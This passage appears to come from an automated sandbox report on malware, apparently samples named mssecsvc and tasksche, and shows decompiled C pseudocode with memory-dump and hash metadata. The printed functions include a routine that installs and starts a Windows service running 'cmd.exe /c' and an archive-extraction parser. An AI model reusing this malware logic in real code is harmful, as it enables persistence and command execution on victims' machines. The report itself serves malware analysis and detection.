				_v120 = _t79;
				if( *_t79 != 0x22) {
					while( *_t79 > 0x20) {
						_t79 = _t79 + 1;
						_v120 = _t79;
					}
				} else {
					do {
						_t79 = _t79 + 1;
						_v120 = _t79;
						_t58 =  *_t79;
					} while (_t58 != 0 && _t58 != 0x22);
					if( *_t79 == 0x22) {
						L6:
						_t79 = _t79 + 1;
						_v120 = _t79;
					}
				}
				_t46 =  *_t79;
				if(_t46 != 0 && _t46 <= 0x20) {
					goto L6;
				}
				_v52 = 0;
				_t47 =  &_v96;
				_push(_t47);
				_t98 =  *_t86 - 0xfffffffe;
				do {
				} while (_t98 > 0);
				asm("pushad");
				_t88 =  &_v184 - 0xffffffdc;
				E00A6B0B4();
				goto L24;
				do {
					do {
						do {
							L24:
							_t61 = 0xffffffffffffffff;
							do {
								_t61 = _t61 - 1;
							} while (_t61 != 0);
							_t79 = _t79 - 1;
							_t71 = _t71 - 1;
							_t74 = _t74 + 1;
							_t47 = _t47 - 1;
							_t66 =  *((intOrPtr*)(_t61 + 0x3c));
							_t67 = _t66 - 0x7ffffffd;
							_t101 = _t67;
						} while (_t101 >= 0);
						asm("sbb ecx, 0x13e6");
					} while (_t101 >= 0);
					_t71 = _t47;
					_t47 = 0;
					_push( *((intOrPtr*)(_t67 + _t61 - 0x7fffec1c)));
					_t88 = _t88 + 4;
					_t28 =  &_v152;
					 *_t28 = _v152 + 0xbab0;
				} while ( *_t28 != 0);
				_t68 = _t67 + 1;
				L00A6B0D0(_t61, 0x77717bc2);
				_v84 = _t79;
				_t50 = L00A6B029(_t61, _t68, _t79);
				_v100 = _t50;
				if(_t50 - 4 >= 0) {
					_t53 =  *[fs:0x18];
					if(_t53 < 0) {
						_t54 = L00A6B0D0(_t61, 0x75edf027);
						L00A6B0CC();
					} else {
						_t71 = _t71 + 1;
						_t54 =  *((intOrPtr*)(_t53 + 0x34));
					}
					if(_t54 == _t61) {
						L00A6B145();
					}
					L00A6B0D0(_t61, 0x9937b23);
					_push(_v108);
					L00A6B0CC();
				}
				 *0x409b1a = 0xa0a815ff;
				 *0x409b1e = 0x40;
				_pop(_t52);
				return _t52;
			}









































                                                                                                                                                0x00409a16
                                                                                                                                                0x00409a19
                                                                                                                                                0x00409a1b
                                                                                                                                                0x00409a20
                                                                                                                                                0x00409a2b
                                                                                                                                                0x00409a2c
                                                                                                                                                0x00409a33
                                                                                                                                                0x00409a36
                                                                                                                                                0x00409a38
                                                                                                                                                0x00409a39
                                                                                                                                                0x00409a3e
                                                                                                                                                0x00409a43
                                                                                                                                                0x00409a4a
                                                                                                                                                0x00409a51
                                                                                                                                                0x00409a64
                                                                                                                                                0x00409a72
                                                                                                                                                0x00409a7b
                                                                                                                                                0x00409a80
                                                                                                                                                0x00409a85
                                                                                                                                                0x00409a8b
                                                                                                                                                0x00409a92
                                                                                                                                                0x00409a98
                                                                                                                                                0x00409a99
                                                                                                                                                0x00409a9e
                                                                                                                                                0x00409aa3
                                                                                                                                                0x00409aa8
                                                                                                                                                0x00409ab2
                                                                                                                                                0x00409acb
                                                                                                                                                0x00409ad1
                                                                                                                                                0x00409ad6
                                                                                                                                                0x00409adb
                                                                                                                                                0x00409ae0
                                                                                                                                                0x00409ae8
                                                                                                                                                0x00409aea
                                                                                                                                                0x00409af0
                                                                                                                                                0x00409b2c
                                                                                                                                                0x00409b31
                                                                                                                                                0x00409b32
                                                                                                                                                0x00409b32
                                                                                                                                                0x00409af2
                                                                                                                                                0x00409af2
                                                                                                                                                0x00409af2
                                                                                                                                                0x00409af3
                                                                                                                                                0x00409af6
                                                                                                                                                0x00409af8
                                                                                                                                                0x00409b03
                                                                                                                                                0x00409b05
                                                                                                                                                0x00409b05
                                                                                                                                                0x00409b06
                                                                                                                                                0x00409b06
                                                                                                                                                0x00409b03
                                                                                                                                                0x00409b09
                                                                                                                                                0x00409b0d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00409b13
                                                                                                                                                0x00409b16
                                                                                                                                                0x00409b19
                                                                                                                                                0x00a6b300
                                                                                                                                                0x00a6b304
                                                                                                                                                0x00a6b304
                                                                                                                                                0x00a6b30a
                                                                                                                                                0x00a6b30b
                                                                                                                                                0x00a6b30e
                                                                                                                                                0x00a6b30e
                                                                                                                                                0x00a6b313
                                                                                                                                                0x00a6b313
                                                                                                                                                0x00a6b313
                                                                                                                                                0x00a6b313
                                                                                                                                                0x00a6b313
                                                                                                                                                0x00a6b314
                                                                                                                                                0x00a6b314
                                                                                                                                                0x00a6b314
                                                                                                                                                0x00a6b318
                                                                                                                                                0x00a6b319
                                                                                                                                                0x00a6b31a
                                                                                                                                                0x00a6b31b
                                                                                                                                                0x00a6b31f
                                                                                                                                                0x00a6b320
                                                                                                                                                0x00a6b320
                                                                                                                                                0x00a6b320
                                                                                                                                                0x00a6b32c
                                                                                                                                                0x00a6b32c
                                                                                                                                                0x00a6b334
                                                                                                                                                0x00a6b336
                                                                                                                                                0x00a6b338
                                                                                                                                                0x00a6b33f
                                                                                                                                                0x00a6b342
                                                                                                                                                0x00a6b342
                                                                                                                                                0x00a6b342
                                                                                                                                                0x00a6b34e
                                                                                                                                                0x00a6b209
                                                                                                                                                0x00a6b20e
                                                                                                                                                0x00a6b212
                                                                                                                                                0x00a6b217
                                                                                                                                                0x00a6b21e
                                                                                                                                                0x00a6b224
                                                                                                                                                0x00a6b17b
                                                                                                                                                0x00a6b18e
                                                                                                                                                0x00a6b193
                                                                                                                                                0x00a6b17d
                                                                                                                                                0x00a6b180
                                                                                                                                                0x00a6b181
                                                                                                                                                0x00a6b181
                                                                                                                                                0x00a6b19a
                                                                                                                                                0x00a6b1a0
                                                                                                                                                0x00a6b1a0
                                                                                                                                                0x00a6b1aa
                                                                                                                                                0x00a6b1af
                                                                                                                                                0x00a6b1b3
                                                                                                                                                0x00a6b1b3
                                                                                                                                                0x00a6b1b8
                                                                                                                                                0x00a6b1c2
                                                                                                                                                0x00a6b1d5
                                                                                                                                                0x00a6b1d6

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000C.00000002.350837226.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000C.00000002.350828305.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 0000000C.00000002.350856800.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 0000000C.00000002.350865277.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 0000000C.00000002.350893467.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 0000000C.00000002.350977158.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 0000000C.00000002.353517886.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_12_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1833031408-0
                                                                                                                                                • Opcode ID: 5f72f19f3f9da0fc9539823f85b1e45c250ddb141765f627d1d6bf63dd3172bf
                                                                                                                                                • Instruction ID: 6dbfe82e28d75cacd77da4482d95f0b678ec48d5d9d3d248bf29ddf29e6ef900
                                                                                                                                                • Opcode Fuzzy Hash: 5f72f19f3f9da0fc9539823f85b1e45c250ddb141765f627d1d6bf63dd3172bf
                                                                                                                                                • Instruction Fuzzy Hash: D941A371814308EFCB34DFA4DD416997BB8FB09720F24423BE5A1A72E2D7781941CB5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 00406C40 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 365COMMONCrypto
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
				signed int _v5;
				signed char _v10;
				char _v11;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				struct _FILETIME _v32;
				struct _FILETIME _v40;
				char _v44;
				unsigned int _v72;
				intOrPtr _v96;
				intOrPtr _v100;
				unsigned int _v108;
				unsigned int _v124;
				char _v384;
				char _v644;
				char _t142;
				char _t150;
				void* _t151;
				signed char _t156;
				long _t173;
				signed char _t185;
				signed char* _t190;
				signed char* _t194;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t209;
				unsigned int _t210;
				char _t212;
				signed char _t230;
				signed int _t234;
				signed char _t238;
				void* _t263;
				unsigned int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				intOrPtr _t272;
				char* _t274;
				unsigned int _t276;
				signed int _t277;
				void* _t278;
				intOrPtr* _t280;
				void* _t281;
				intOrPtr _t282;

				_t263 = __edx;
				_t213 = __ecx;
				_t272 = _a4;
				_t208 = _t207 | 0xffffffff;
				_t280 = __ecx;
				_v24 = __ecx;
				if(_t272 < _t208) {
					L61:
					return 0x10000;
				}
				_t131 =  *__ecx;
				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L61;
				}
				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
					E00406A97(_t131);
					_pop(_t213);
				}
				 *(_t280 + 4) = _t208;
				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
					if(_t272 != _t208) {
						_t132 =  *_t280;
						if(_t272 >=  *( *_t280 + 0x10)) {
							L12:
							_t133 =  *_t280;
							if( *( *_t280 + 0x10) >= _t272) {
								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
									if(_t142 != 0) {
										L19:
										return 0x800;
									}
									_push(_v16);
									L00407700();
									_v12 = _t142;
									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
										_t281 = _a8;
										 *_t281 =  *( *_t280 + 0x10);
										strcpy( &_v644,  &_v384);
										_t209 = __imp___mbsstr;
										_t274 =  &_v644;
										while(1) {
											L21:
											_t150 =  *_t274;
											if(_t150 != 0 && _t274[1] == 0x3a) {
												break;
											}
											if(_t150 == 0x5c || _t150 == 0x2f) {
												_t274 =  &(_t274[1]);
												continue;
											} else {
												_t151 =  *_t209(_t274, "\\..\\");
												if(_t151 != 0) {
													L31:
													_t39 = _t151 + 4; // 0x4
													_t274 = _t39;
													continue;
												}
												_t151 =  *_t209(_t274, "\\../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/..\\");
												if(_t151 == 0) {
													strcpy(_t281 + 4, _t274);
													_t264 = _v72;
													_a11 = _a11 & 0x00000000;
													_v5 = _v5 & 0x00000000;
													_t156 = _t264 >> 0x0000001e & 0x00000001;
													_t230 =  !(_t264 >> 0x17) & 0x00000001;
													_t276 = _v124 >> 8;
													_t210 = 1;
													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
														_a11 = _t264 >> 0x00000001 & 0x00000001;
														_t230 = _t264 & 0x00000001;
														_v5 = _t264 >> 0x00000002 & 0x00000001;
														_t156 = _t264 >> 0x00000004 & 0x00000001;
														_t264 = _t264 >> 0x00000005 & 0x00000001;
														_t210 = _t264;
													}
													_t277 = 0;
													 *(_t281 + 0x108) = 0;
													if(_t156 != 0) {
														 *(_t281 + 0x108) = 0x10;
													}
													if(_t210 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
													}
													if(_a11 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
													}
													if(_t230 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
													}
													if(_v5 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
													}
													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
													_v40.dwHighDateTime = _t264;
													LocalFileTimeToFileTime( &_v40,  &_v32);
													_t173 = _v32.dwLowDateTime;
													_t234 = _v32.dwHighDateTime;
													_t212 = _v12;
													 *(_t281 + 0x10c) = _t173;
													 *(_t281 + 0x114) = _t173;
													 *(_t281 + 0x11c) = _t173;
													 *(_t281 + 0x110) = _t234;
													 *(_t281 + 0x118) = _t234;
													 *(_t281 + 0x120) = _t234;
													if(_v16 <= 4) {
														L57:
														if(_t212 != 0) {
															_push(_t212);
															L004076E8();
														}
														_t282 = _v24;
														memcpy(_t282 + 8, _t281, 0x12c);
														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
														goto L60;
													} else {
														while(1) {
															_v12 =  *((intOrPtr*)(_t277 + _t212));
															_v10 = _v10 & 0x00000000;
															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
															if(strcmp( &_v12, "UT") == 0) {
																break;
															}
															_t277 = _t277 + _a8 + 4;
															if(_t277 + 4 < _v16) {
																continue;
															}
															goto L57;
														}
														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
														_t185 = _t238 >> 0x00000001 & 0x00000001;
														_t278 = _t277 + 5;
														_a11 = _t185;
														_v5 = _t238 >> 0x00000002 & 0x00000001;
														if((_t238 & 0x00000001) != 0) {
															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t194 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
															_t185 = _a11;
															 *(_t281 + 0x120) = _t271;
														}
														if(_t185 != 0) {
															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t190 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
															 *(_t281 + 0x110) = _t270;
														}
														if(_v5 != 0) {
															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
															 *(_t281 + 0x118) = _t269;
														}
														goto L57;
													}
												}
												goto L31;
											}
										}
										_t274 =  &(_t274[2]);
										goto L21;
									}
									_push(_v12);
									L004076E8();
									goto L19;
								}
								return 0x700;
							}
							E00406520(_t133);
							L11:
							_pop(_t213);
							goto L12;
						}
						E004064E2(_t213, _t132);
						goto L11;
					}
					goto L8;
				} else {
					if(_t272 == _t208) {
						L8:
						_t204 = _a8;
						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
						 *((char*)(_t204 + 4)) = 0;
						 *((intOrPtr*)(_t204 + 0x108)) = 0;
						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
						 *((intOrPtr*)(_t204 + 0x110)) = 0;
						 *((intOrPtr*)(_t204 + 0x114)) = 0;
						 *((intOrPtr*)(_t204 + 0x118)) = 0;
						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
						 *((intOrPtr*)(_t204 + 0x120)) = 0;
						 *((intOrPtr*)(_t204 + 0x124)) = 0;
						 *((intOrPtr*)(_t204 + 0x128)) = 0;
						L60:
						return 0;
					}
					memcpy(_a8, _t280 + 8, 0x12c);
					goto L60;
				}
			}


















































                                                                                                                                                0x00406c40
                                                                                                                                                0x00406c40
                                                                                                                                                0x00406c4c
                                                                                                                                                0x00406c4f
                                                                                                                                                0x00406c52
                                                                                                                                                0x00406c56
                                                                                                                                                0x00406c59
                                                                                                                                                0x00407064
                                                                                                                                                0x00000000
                                                                                                                                                0x00407064
                                                                                                                                                0x00406c5f
                                                                                                                                                0x00406c64
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406c6d
                                                                                                                                                0x00406c70
                                                                                                                                                0x00406c75
                                                                                                                                                0x00406c75
                                                                                                                                                0x00406c7c
                                                                                                                                                0x00406c7f
                                                                                                                                                0x00406ca0
                                                                                                                                                0x00406cec
                                                                                                                                                0x00406cf1
                                                                                                                                                0x00406cfa
                                                                                                                                                0x00406cfa
                                                                                                                                                0x00406cff
                                                                                                                                                0x00406d21
                                                                                                                                                0x00406d3e
                                                                                                                                                0x00406d52
                                                                                                                                                0x00406d5c
                                                                                                                                                0x00406d89
                                                                                                                                                0x00000000
                                                                                                                                                0x00406d89
                                                                                                                                                0x00406d5e
                                                                                                                                                0x00406d61
                                                                                                                                                0x00406d68
                                                                                                                                                0x00406d7e
                                                                                                                                                0x00406d95
                                                                                                                                                0x00406d9b
                                                                                                                                                0x00406dab
                                                                                                                                                0x00406db0
                                                                                                                                                0x00406db8
                                                                                                                                                0x00406dbe
                                                                                                                                                0x00406dbe
                                                                                                                                                0x00406dbe
                                                                                                                                                0x00406dc2
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406dd0
                                                                                                                                                0x00406dd6
                                                                                                                                                0x00000000
                                                                                                                                                0x00406dd9
                                                                                                                                                0x00406ddf
                                                                                                                                                0x00406de5
                                                                                                                                                0x00406e11
                                                                                                                                                0x00406e11
                                                                                                                                                0x00406e11
                                                                                                                                                0x00000000
                                                                                                                                                0x00406e11
                                                                                                                                                0x00406ded
                                                                                                                                                0x00406df3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406dfb
                                                                                                                                                0x00406e01
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406e09
                                                                                                                                                0x00406e0f
                                                                                                                                                0x00406e1b
                                                                                                                                                0x00406e20
                                                                                                                                                0x00406e28
                                                                                                                                                0x00406e2c
                                                                                                                                                0x00406e3c
                                                                                                                                                0x00406e3e
                                                                                                                                                0x00406e41
                                                                                                                                                0x00406e44
                                                                                                                                                0x00406e46
                                                                                                                                                0x00406e61
                                                                                                                                                0x00406e6b
                                                                                                                                                0x00406e6d
                                                                                                                                                0x00406e78
                                                                                                                                                0x00406e7a
                                                                                                                                                0x00406e7c
                                                                                                                                                0x00406e7c
                                                                                                                                                0x00406e7e
                                                                                                                                                0x00406e82
                                                                                                                                                0x00406e88
                                                                                                                                                0x00406e8a
                                                                                                                                                0x00406e8a
                                                                                                                                                0x00406e96
                                                                                                                                                0x00406e98
                                                                                                                                                0x00406e98
                                                                                                                                                0x00406ea3
                                                                                                                                                0x00406ea5
                                                                                                                                                0x00406ea5
                                                                                                                                                0x00406eae
                                                                                                                                                0x00406eb0
                                                                                                                                                0x00406eb0
                                                                                                                                                0x00406ebb
                                                                                                                                                0x00406ebd
                                                                                                                                                0x00406ebd
                                                                                                                                                0x00406eca
                                                                                                                                                0x00406ed3
                                                                                                                                                0x00406ee6
                                                                                                                                                0x00406ef2
                                                                                                                                                0x00406ef5
                                                                                                                                                0x00406efb
                                                                                                                                                0x00406efe
                                                                                                                                                0x00406f05
                                                                                                                                                0x00406f08
                                                                                                                                                0x00406f0e
                                                                                                                                                0x00406f14
                                                                                                                                                0x00406f1a
                                                                                                                                                0x00406f20
                                                                                                                                                0x00406f26
                                                                                                                                                0x00406f2c
                                                                                                                                                0x00407037
                                                                                                                                                0x00407039
                                                                                                                                                0x0040703b
                                                                                                                                                0x0040703c
                                                                                                                                                0x00407041
                                                                                                                                                0x00407048
                                                                                                                                                0x0040704f
                                                                                                                                                0x0040705a
                                                                                                                                                0x00000000
                                                                                                                                                0x00406f32
                                                                                                                                                0x00406f32
                                                                                                                                                0x00406f3a
                                                                                                                                                0x00406f41
                                                                                                                                                0x00406f45
                                                                                                                                                0x00406f4d
                                                                                                                                                0x00406f5d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406f62
                                                                                                                                                0x00406f6c
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00406f6e
                                                                                                                                                0x00406f73
                                                                                                                                                0x00406f81
                                                                                                                                                0x00406f86
                                                                                                                                                0x00406f89
                                                                                                                                                0x00406f8f
                                                                                                                                                0x00406f92
                                                                                                                                                0x00406f94
                                                                                                                                                0x00406f99
                                                                                                                                                0x00406f9e
                                                                                                                                                0x00406fba
                                                                                                                                                0x00406fc0
                                                                                                                                                0x00406fc4
                                                                                                                                                0x00406fc4
                                                                                                                                                0x00406fcc
                                                                                                                                                0x00406fce
                                                                                                                                                0x00406fd3
                                                                                                                                                0x00406fd8
                                                                                                                                                0x00406ff4
                                                                                                                                                0x00406ffb
                                                                                                                                                0x00406ffb
                                                                                                                                                0x00407005
                                                                                                                                                0x00407007
                                                                                                                                                0x0040702a
                                                                                                                                                0x00407031
                                                                                                                                                0x00407031
                                                                                                                                                0x00000000
                                                                                                                                                0x00407005
                                                                                                                                                0x00406f2c
                                                                                                                                                0x00000000
                                                                                                                                                0x00406e0f
                                                                                                                                                0x00406dd0
                                                                                                                                                0x00406dcb
                                                                                                                                                0x00000000
                                                                                                                                                0x00406dcb
                                                                                                                                                0x00406d80
                                                                                                                                                0x00406d83
                                                                                                                                                0x00000000
                                                                                                                                                0x00406d88
                                                                                                                                                0x00000000
                                                                                                                                                0x00406d40
                                                                                                                                                0x00406d02
                                                                                                                                                0x00406cf9
                                                                                                                                                0x00406cf9
                                                                                                                                                0x00000000
                                                                                                                                                0x00406cf9
                                                                                                                                                0x00406cf4
                                                                                                                                                0x00000000
                                                                                                                                                0x00406cf4
                                                                                                                                                0x00000000
                                                                                                                                                0x00406c81
                                                                                                                                                0x00406c83
                                                                                                                                                0x00406ca2
                                                                                                                                                0x00406ca7
                                                                                                                                                0x00406caa
                                                                                                                                                0x00406cae
                                                                                                                                                0x00406cb1
                                                                                                                                                0x00406cb7
                                                                                                                                                0x00406cbd
                                                                                                                                                0x00406cc3
                                                                                                                                                0x00406cc9
                                                                                                                                                0x00406ccf
                                                                                                                                                0x00406cd5
                                                                                                                                                0x00406cdb
                                                                                                                                                0x00406ce1
                                                                                                                                                0x00407060
                                                                                                                                                0x00000000
                                                                                                                                                0x00407060
                                                                                                                                                0x00406c91
                                                                                                                                                0x00000000
                                                                                                                                                0x00406c96

                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: /../$/..\$\../$\..\
                                                                                                                                                • API String ID: 3510742995-3885502717
                                                                                                                                                • Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                                                                                                                                                • Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
                                                                                                                                                • Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                                                                                                                                                • Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401CE8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75serviceCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00401CE8(intOrPtr _a4) {
				void* _v8;
				int _v12;
				void* _v16;
				char _v1040;
				void* _t12;
				void* _t13;
				void* _t31;
				int _t32;

				_v12 = 0;
				_t12 = OpenSCManagerA(0, 0, 0xf003f);
				_v8 = _t12;
				if(_t12 != 0) {
					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
					_v16 = _t13;
					if(_t13 == 0) {
						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
						if(_t31 != 0) {
							StartServiceA(_t31, 0, 0);
							CloseServiceHandle(_t31);
							_v12 = 1;
						}
						_t32 = _v12;
					} else {
						StartServiceA(_t13, 0, 0);
						CloseServiceHandle(_v16);
						_t32 = 1;
					}
					CloseServiceHandle(_v8);
					return _t32;
				}
				return 0;
			}











                                                                                                                                                0x00401cfb
                                                                                                                                                0x00401cfe
                                                                                                                                                0x00401d06
                                                                                                                                                0x00401d09
                                                                                                                                                0x00401d21
                                                                                                                                                0x00401d29
                                                                                                                                                0x00401d2c
                                                                                                                                                0x00401d54
                                                                                                                                                0x00401d7b
                                                                                                                                                0x00401d7f
                                                                                                                                                0x00401d84
                                                                                                                                                0x00401d8b
                                                                                                                                                0x00401d91
                                                                                                                                                0x00401d91
                                                                                                                                                0x00401d98
                                                                                                                                                0x00401d2e
                                                                                                                                                0x00401d31
                                                                                                                                                0x00401d3a
                                                                                                                                                0x00401d42
                                                                                                                                                0x00401d42
                                                                                                                                                0x00401d9e
                                                                                                                                                0x00000000
                                                                                                                                                0x00401da7
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
                                                                                                                                                • OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
                                                                                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
                                                                                                                                                • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
                                                                                                                                                • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandleOpen$ManagerStart
                                                                                                                                                • String ID: cmd.exe /c "%s"
                                                                                                                                                • API String ID: 1485051382-955883872
                                                                                                                                                • Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                                                                                                                • Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
                                                                                                                                                • Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                                                                                                                • Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00402A76 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334COMMONCrypto
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
				signed int _v8;
				signed int _v12;
				char _v24;
				int _t193;
				signed int _t198;
				int _t199;
				intOrPtr _t200;
				signed int* _t205;
				signed char* _t206;
				signed int _t208;
				signed int _t210;
				signed int* _t216;
				signed int _t217;
				signed int* _t220;
				signed int* _t229;
				void* _t252;
				void* _t280;
				void* _t281;
				signed int _t283;
				signed int _t289;
				signed int _t290;
				signed char* _t291;
				signed int _t292;
				void* _t303;
				void* _t313;
				intOrPtr* _t314;
				void* _t315;
				intOrPtr* _t316;
				signed char* _t317;
				signed char* _t319;
				signed int _t320;
				signed int _t322;
				void* _t326;
				void* _t327;
				signed int _t329;
				signed int _t337;
				intOrPtr _t338;
				signed int _t340;
				intOrPtr _t341;
				void* _t342;
				signed int _t345;
				signed int* _t346;
				signed int _t347;
